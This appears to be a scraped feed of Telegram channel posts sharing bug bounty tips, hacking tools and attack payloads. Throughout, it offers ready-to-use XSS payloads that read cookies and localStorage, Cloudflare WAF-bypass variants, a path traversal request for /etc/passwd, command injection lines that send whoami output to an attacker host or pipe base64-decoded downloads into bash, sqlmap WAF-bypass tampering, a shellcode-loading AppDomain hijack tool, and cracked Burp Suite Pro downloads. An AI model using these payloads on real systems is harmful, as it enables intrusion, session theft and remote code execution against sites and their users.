Parameter: invitedby=

Payload=%22%3E%3Cnoscript%3Ealert(document.cookie)%3C/noscript%3E

Full_url= https://site. com/?invitedby=%22%3E%3Cnoscript%3Ealert(document.cookie)%3C/noscript%3E

#XSS #BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|noscript|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <noscript>confirm(1)</noscript>' | xsschecker -match '<sCript>confirm(1)</sCript>, <noscript>confirm(1)</noscript>' -vuln

⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )
🔒 LearnExploit ( BOT )

#XSS #BugBounty #Oneliner #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

👁 Burpsuite Pro 👁

🔥 v2024.3.1

🔔 BurpBountyPro_v2.8.0 ➕

📂 README (en+ru) included, plz read it before run BS.

🔼 Run this version With Java SE JDK 22

⬇️ Download

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🌐 Ominis OSINT: Secure Web-Search 🌐

📊 Features:
🚀 Enhanced User Interface: Enjoy a redesigned interface for a seamless experience, suitable for both novice and experienced users.
🔎 Expanded Digital Reconnaissance: Conduct thorough investigations with advanced tools to gather and analyze publicly available information from diverse online sources.
💡 Threading Optimization: Experience faster execution times with optimized threading, improving efficiency and reducing waiting periods during username searches.
📊 Detailed Results: Gain comprehensive insights from search results, including detailed information extracted from various sources such as social profiles, mentions, and potential forum links.
⚙️ Proxy Validation: The tool validates proxies for secure and efficient web requests, ensuring anonymity and privacy during the search process. This feature enhances the reliability of the search results by utilizing a pool of validated proxies, mitigating the risk of IP blocking and ensuring seamless execution of the search queries.
🕵️‍♂️ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
🛡 Randomized Proxy Agents: In addition to proxy validation, the tool utilizes randomized proxy agents for each request, further enhancing user anonymity. By rotating through a pool of proxies, the tool reduces the chances of being tracked or identified by websites, thus safeguarding user privacy throughout the reconnaissance process.
🔍 Username Search: Searches a list of URLs for a specific username. Utilizes threading for parallel execution. Provides detailed results with URL and HTTP status code.

🔼 Installation:

cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Osint #Search #Engin #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👁 Burpsuite Pro 👁

🔥 v2024.3.1.2

🔔 BurpBountyPro_v2.8.0 ➕

📂 README (en+ru) included, plz read it before run BS.

🔼 Run this version With Java SE JDK 22

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🤖 AutoAppDomainHijack 🤖

💬
Tools to automate finding AppDomain hijacks and generating payloads from shellcode.

👤 HijackHunt:
Run this tool on the target. It will search recursively in the C:\ directory for .NET managed `.exe`s and test if the folder is writeable - indicating that the PE is AppDomainHijack-able.

💡 AutoDomainHijack:
💻 Usage:

  AutoDomainHijack.exe (--version | -h | --help)

📊 Options:

-t, --target-name=<target-name>  Name of the target managed .exe to hijack.
-n, --hijack-name=<hijack-name>  Name of the hijacker .dll.
-u, --url=<url>                  URL of the remote shellcode to run.
-f, --file=<file>                File containing the shellcode to embed.
-o, --output=<output>            Full directory to write files to.
-e, --etw=<etw>                  Disable ETW. [default: true]
--version                    Prints version
-h, --help                       Show help message

📂 Build:

nimble build

😸 Github

⬇️ Download
🔒 BugCod3

#Hijack #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔍 MultCheck 🔍

💬
MultCheck is a malware-analysis tool that can be used to test the detection of a file by multiple AV engines.
It is designed to be easy to use, and to be able to test multiple AV engines. It is also designed to be easy to extend, and to be able to add custom AV engines.

🔼 Installation:
Run go build under the root directory of the project.
OR

cd src
# Build for Windows
## 64-bit
GOOS=windows GOARCH=amd64 go build -o ../bin/multcheck_x64.exe main.go

## 32-bit
GOOS=windows GOARCH=386 go build -o ../bin/multcheck_x32.exe main.go

💻 Usage:

MultCheck accepts a target file as an argument: ./multcheck <target_file>

Different built-in scanners can be used by specifying the -scanner flag: ./multcheck -scanner <scanner_name> <target_file>

Custom scanners can be added by creating a configuration file and providing the path to the file through the -scanner flag: ./multcheck -scanner <path_to_config_file> <target_file>

👤 Supported Scanners:
💻 Windows Defender (winDef)

😸 Github

⬇️ Download
🔒 BugCod3

#GO #Malware #Analysis #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :'%3e%3cnoscript%3ealert(5*5)%3c%2fnoscript%3eejj4sbx5w4o

#BugBounty #Tips #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CloudFlare Payload

<noscript%0Aonauxclick=0;[1].some(confirm)//
<noscript onload=alert%26%230000000040"")>
<noscript onx=() onload=(confirm)(1)>
<noscript onx=() onload=(confirm)(document.cookie)>
<noscript onx=() onload=(confirm)(JSON.stringify(localStorage))>

#Payload #Cloudflare #Pentest
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/A3l3_KA4

Advanced SQL Injection for AWAE

Goal is to master SQL Injection Discovery, Detection and Exploitation

📊 Table of Content:
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queires doesn't work (MySQL Error Based SQLi)
- The Alternative ways of using AND/OR 0 in SQLi
- The Alternative ways of using NULL in SQLi
- The Alternative way of using WhiteSpace in SQLi
- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi

AND...

😸 Github

⬇️ Download
🔒 BugCod3

#Sql #Injection #AWAE
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

The part of the PoC that must be encoded. This is how it is done if you haven't found a way to do it yet.

GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

#PoC #Pyaload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

lazydocker

💬
A simple terminal UI for both docker and docker-compose, written in Go with the gocui library.

📂 Requirements:
⚪️ Docker >= 1.13 (API >= 1.25)
⚪️ Docker-Compose >= 1.23.2 (optional)

🔼 Installation:

curl https://raw.githubusercontent.com/jesseduffield/lazydocker/master/noscripts/install_update_linux.sh | bash

OR
⚪️ Required Go Version >= 1.19

go install github.com/jesseduffield/lazydocker@latest

💻 Usage:

echo "alias lzd='lazydocker'" >> ~/.zshrc

⚪️ Basic video tutorial here.
⚪️ List of keybindings here.

📊 Features:
⚪️ viewing the state of your docker or docker-compose container environment at a glance
⚪️ viewing logs for a container/service
⚪️ viewing ascii graphs of your containers' metrics so that you can not only feel but also look like a developer
⚪️ customising those graphs to measure nearly any metric you want
⚪️ attaching to a container/service
⚪️ restarting/removing/rebuilding containers/services
⚪️ viewing the ancestor layers of a given image
⚪️ pruning containers, images, or volumes that are hogging up disk space

😸 Github

⬇️ Download
🔒 BugCod3

#Manage #Docker
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

OS Command Injection ⚔️

curl${IFS}$(whoami).atckr

echo${IFS}Y3VybCBodHRwOi8vdTBfYTIxNS1sb2NhbGhvc3QuYXR0YWNrZXIK|base64${IFS}-d|bash

curl${IFS}atckr?$(whoami)

echo${IFS}Y3VybCBodHRwOi8vYXR0YWNrZXI/dTBfYTIxNT1sb2NhbGhvc3QK|base64${IFS}-d|bash

#InfoSec #CyberSec #BugBounty #Tip
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

The State of Modern Attack Surfaces

👩‍💻 Google Drive

⬇️ Download

#Nahamcon #Bypass #WAF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

If you find sql injection and encounter a 403 or waf block, be sure to try tamper noscripts and update your sqlmap

Payload:
sqlmap -r req.txt --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Experts warn of a new ATM malware family that is advertised in the cybercrime underground, it was developed to target Europe.

🌎 Blog

#ATM #Malware #News
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CNEXT exploits

💬
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()

👁‍🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:

⚪️ Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...

🗝 Exploits:
Exploits will become available as blogposts come out.

⚪️ CNEXT: file read to RCE exploit
⚪️ To be continued...

😸 Github

⬇️ Download
🔒 BugCod3

#CVE #Exploit #Cnext
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

DOMAINIM

💬
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.

📊 Features:
⚪️ Subdomain enumeration (2 engines + bruteforcing)
⚪️ User-friendly output
⚪️ Resolving A records (IPv4)
⚪️ Virtual hostname enumeration
⚪️ Reverse DNS lookup
⚪️ Detects wildcard subdomains (for bruteforcing)
⚪️ Basic TCP port scanning
⚪️ Subdomains are accepted as input
⚪️ Export results to JSON file

🔼 Installation:

cd domainim
nimble build
./domainim <domain> [--ports=<ports>]

💻 Usage:

./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]

📂 Examples:
⚪️ ./domainim nmap.org --ports=all
⚪️ ./domainim google.com --ports=none --dns=8.8.8.8#53
⚪️ ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
⚪️ ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json
⚪️ ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

😸 Github

⬇️ Download
🔒 BugCod3

#Pentest #RedTeam #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

GAP Burp Extension

💬
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.

🔼 Installation:
⚪️ Visit Jython Offical Site, and download the latest stand alone JAR file, e.g. jython-standalone-2.7.3.jar.
⚪️ Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
⚪️ On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
⚪️ Download the GAP.py and requirements.txt from this project and place in the same directory.
⚪️ nstall Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
⚪️ Go to the Extensions -> Installed and click Add under Burp Extensions.
⚪️ Select Extension type of Python and select the GAP.py file.

💻 Using:
⚪️ Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP
⚪️ you can right click a request or response in any other context and select GAP from the Extensions menu.

😸 Github

⬇️ Download
🔒 BugCod3

#BurpSuite #Extensions
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

LazyEgg - Hunting JS Files

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips'

#BugBounty #Tips #CyberSec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Cross Site Scripting Xss Payload

Payload:
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--

#XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3